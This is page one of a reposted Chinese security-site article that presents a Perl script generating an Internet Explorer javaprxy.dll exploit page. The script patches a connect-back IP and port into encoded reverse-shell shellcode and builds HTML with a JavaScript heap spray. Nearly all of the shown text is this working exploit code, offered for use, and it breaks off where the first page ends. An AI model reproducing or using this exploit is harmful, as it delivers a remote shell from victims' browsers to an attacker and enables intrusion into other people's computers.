|
|
域名空间 下载中心 社区论坛 信息公告 my小屋 | |
 |
联系我们 设为首页 加入收藏 |
 |
|
 |
首页 | 新闻资讯 | 编程开发 | 网页设计 | 图形图象 | 网络媒体 | 网站模板 | 数 据 库 | 投稿 论坛 | 操作系统 | 系统优化 | 网络安全 | 黑客技术 | 硬件学堂 | 硬件报价 | 服 务 器 | 地图 专题 | 应用软件 | 聊天通讯 | q q 专栏 | 建站经验 | 在线工具 | 站长club | 注 册 表 | 旧版 社会 | 游戏娱乐 | 设计欣赏 | 疑难解答 | 社区论坛 | 网络赚钱 | 网站地图 | 广告服务 | 服务 |
 |
 |
 |
 当前位置:首页>>网络安全>>安全防范>>正文 |
新版上线![旧版] |  |
|||
注:打开慢时请稍等
|
本地监听的shellcode没什么利用价值,还是反向的来得舒服。但是这个shellcode修改不是那么容易的是,为了防止shellcode被unicode编码所以要采用点小措施来方法。 整个程序我已经写出来了,如下,完全perl代码: #! /usr/bin/perl #doomie.pl use strict; use socket; my $reverse_shell="\xeb\x10\x5b\x4b\x33\xc9\x66\xb9\x25\x01\x80\x34\x0b\x99\xe2\xfa". "\xeb\x05\xe8\xeb\xff\xff\xff". "\x70\x62\x99\x99\x99\xc6\xfd\x38\xa9\x99\x99\x99\x12\xd9\x95\x12". "\xe9\x85\x34\x12\xf1\x91\x12\x6e\xf3\x9d\xc0\x71\x02\x99\x99\x99". "\x7b\x60\xf1\xaa\xab\x99\x99\xf1\xee\xea\xab\xc6\xcd\x66\x8f\x12". "\x71\xf3\x9d\xc0\x71\x1b\x99\x99\x99\x7b\x60\x18\x75\x09\x98\x99". "\x99\xcd\xf1\x98\x98\x99\x99\x66\xcf\x89\xc9\xc9\xc9\xc9\xd9\xc9". "\xd9\xc9\x66\xcf\x8d\x12\x41\xf1\xe6\x99\x99\x98\xf1\x9b\x99\x9d". "\x4b\x12\x55\xf3\x89\xc8\xca\x66\xcf\x81\x1c\x59\xec\xd3\xf1\xfa". "\xf4\xfd\x99\x10\xff\xa9\x1a\x75\xcd\x14\xa5\xbd\xf3\x8c\xc0\x32". "\x7b\x64\x5f\xdd\xbd\x89\xdd\x67\xdd\xbd\xa4\x10\xc5\xbd\xd1\x10". "\xc5\xbd\xd5\x10\xc5\xbd\xc9\x14\xdd\xbd\x89\xcd\xc9\xc8\xc8\xc8". "\xf3\x98\xc8\xc8\x66\xef\xa9\xc8\x66\xcf\x9d\x12\x55\xf3\x66\x66". "\xa8\x66\xcf\x91\xca\x66\xcf\x85\x66\xcf\x95\xc8\xcf\x12\xdc\xa5". "\x12\xcd\xb1\xe1\x9a\x4c\xcb\x12\xeb\xb9\x9a\x6c\xaa\x50\xd0\xd8". "\x34\x9a\x5c\xaa\x42\x96\x27\x89\xa3\x4f\xed\x91\x58\x52\x94\x9a". "\x43\xd9\x72\x68\xa2\x86\xec\x7e\xc3\x12\xc3\xbd\x9a\x44\xff\x12". "\x95\xd2\x12\xc3\x85\x9a\x44\x12\x9d\x12\x9a\x5c\x32\xc7\xc0\x5a". "\x71\x99\x66\x66\x66\x17\xd7\x97\x75\xeb\x67\x2a\x8f\x34\x40\x9c". "\x57\x76\x57\x79\xf9\x52\x74\x65\xa2\x40\x90\x6c\x34\x75\x60\x33". "\xf9\x7e\xe0\x5f\xe0"; my $shellcode_text; print "\tmicrosoft internet explorer javaprxy.dll com object remote exploit\n\n"; print "\t\t connect back shell rewritten by 无敌最寂寞[est]\n\n"; print " usage:\n\tdoomie.pl <connect-back-ip> <connect-back-port> [destination file]\n\n"; print " attention:if [destination file] is omitted,superlone.html will be default!\n\n"; my $ip=shift || die "[-]error! connect back ip must be specified!\n"; my $port=shift || die "[-]error!connect back port must be specified!\n"; my $file=shift || "superlone.html"; print "[+]generating shellcode ......"; $ip=inet_aton($ip); $ip=$ip^(pack "l",0x99999999); $port=(pack "n",$port)^(pack "s",0x9999); substr($reverse_shell,118,2)=$port; substr($reverse_shell,111,4)=$ip; #open(file,">temp"); #binmode(file); #print file $reverse_shell; #close(file); my $len=length($reverse_shell); my @temp; my $i=0; while($i<$len){ $temp[$i]=sprintf("%.2x",ord(substr($reverse_shell,$i,1))); $i++; } $i=0; while($i<$len) { if($i % 2!=0) { $shellcode_text.="%u".$temp[$i].$temp[$i-1]; } $i++; } print "done\n"; print "[+]creating exploitable file ......"; my $header = "<html><body>\n<script language=\"javascript\">\n"; my $jedi="shellcode = unescape(\"%u4343\"+\"%u4343\"+\"$shellcode_text\");\n"; # memory my $code = "bigblock = unescape(\"%u0d0d%u0d0d\");\n". "headersize = 20;\n". "slackspace = headersize+shellcode.length;\n". "while (bigblock.length<slackspace) bigblock+=bigblock;\n". "fillblock = bigblock.substring(0, slackspace);\n". "block = bigblock.substring(0, bigblock.length-slackspace);\n". "while(block.length+slackspace<0x40000) block = block+block+fillblock;\n". "memory = new array();\n". "for (i=0;i<750;i++) memory[i] = block + shellcode;\n". "</script>\n"; 本新闻共2页,当前在第1页 1 2 编辑:黑鹰 [发送给好友] [打印本页] [关闭窗口] [返回顶部] 上一篇:建立全面的网络安全体系 下一篇:计算机加密反跟踪技术密文技术 转载请注明来源:www.iyit.net 特别声明: 本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。 |
| 最新更新 | 热点排行 | 推荐新闻 | ||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||
| 友情链接 | ||||||
 |
设置首 页 - 版权声明 - 广告服务 - 关于我们 - 联系我们 - 友情连接 |  |
| |||||||
易特网络技术